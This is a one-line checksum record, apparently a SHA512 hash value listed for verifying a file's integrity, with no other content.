SHA512 ffc2211f3d377ebc245f03c5ed0667dde023afbfb931158d80ca84923664def832a28b696e51f81271604fc244ea25409d0720a817b738177f28db9b72a6248c